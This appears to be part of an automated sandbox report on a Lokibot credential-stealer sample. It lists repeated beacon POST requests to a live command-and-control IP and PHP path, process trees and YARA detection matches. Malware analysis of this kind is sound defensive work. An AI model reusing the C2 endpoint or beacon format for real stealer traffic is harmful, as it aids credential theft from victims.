                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:55.944955111 CET1237INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:55 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              71192.168.2.54976787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:56.202303886 CET1238OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:57.125554085 CET1239INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:56 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              72192.168.2.54976887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:57.369297028 CET1239OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:58.576225042 CET1240INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:57 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              73192.168.2.54976987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:58.816874027 CET1241OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:02:01.043610096 CET1241INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:58 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              74192.168.2.54977087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:02:01.283552885 CET1242OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:02:02.824486971 CET1243INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:02:01 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              75192.168.2.54977187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:02:03.077739954 CET1243OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              76192.168.2.54977287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              77192.168.2.54977387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              78192.168.2.54977487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              79192.168.2.54977587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              8192.168.2.54970387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:08.319139957 CET1142OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:09.199748039 CET1142INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:08 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              80192.168.2.54977687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              81192.168.2.54977787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              82192.168.2.54977887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              83192.168.2.54977987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              84192.168.2.54978087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              85192.168.2.54978187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              86192.168.2.54978287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              87192.168.2.54978387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              88192.168.2.54978487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              89192.168.2.54978587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              9192.168.2.54970487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData
                                              Mar 15, 2021 20:01:09.459260941 CET1143OUTPOST /m0ha/0/pin.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 87.251.79.157
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 6DBE4C7C
                                              Content-Length: 165
                                              Connection: close
                                              Mar 15, 2021 20:01:09.990871906 CET1144INHTTP/1.0 404 Not Found
                                              Date: Mon, 15 Mar 2021 19:01:09 GMT
                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                              X-Powered-By: PHP/5.6.40
                                              Status: 404 Not Found
                                              Content-Length: 23
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              90192.168.2.54978687.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              91192.168.2.54978787.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              92192.168.2.54978887.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              93192.168.2.54978987.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              94192.168.2.54979087.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              95192.168.2.54979187.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              96192.168.2.54979287.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              97192.168.2.54979387.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              98192.168.2.54979487.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              99192.168.2.54979587.251.79.15780C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              TimestampkBytes transferredDirectionData


                                              HTTPS Packets

                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                              Mar 15, 2021 20:00:49.109810114 CET172.67.197.219443192.168.2.549692CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Mar 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Sat Mar 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                              CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 2576 Parent PID: 5660

                                              General

                                              Start time:20:00:46
                                              Start date:15/03/2021
                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe'
                                              Imagebase:0xa60000
                                              File size:433664 bytes
                                              MD5 hash:968E090B17CE57156A66188B4DB032BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: cmd.exe PID: 4176 Parent PID: 2576

                                              General

                                              Start time:20:00:51
                                              Start date:15/03/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                              Imagebase:0x12e0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: conhost.exe PID: 1552 Parent PID: 4176

                                              General

                                              Start time:20:00:52
                                              Start date:15/03/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7ecfc0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: timeout.exe PID: 3896 Parent PID: 4176

                                              General

                                              Start time:20:00:52
                                              Start date:15/03/2021
                                              Path:C:\Windows\SysWOW64\timeout.exe
                                              Wow64 process (32bit):true
                                              Commandline:timeout 1
                                              Imagebase:0x3d0000
                                              File size:26112 bytes
                                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 5804 Parent PID: 2576

                                              General

                                              Start time:20:00:55
                                              Start date:15/03/2021
                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              Imagebase:0x630000
                                              File size:433664 bytes
                                              MD5 hash:968E090B17CE57156A66188B4DB032BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: WerFault.exe PID: 5944 Parent PID: 2576

                                              General

                                              Start time:20:00:58
                                              Start date:15/03/2021
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 2120
                                              Imagebase:0x7ff797770000
                                              File size:434592 bytes
                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >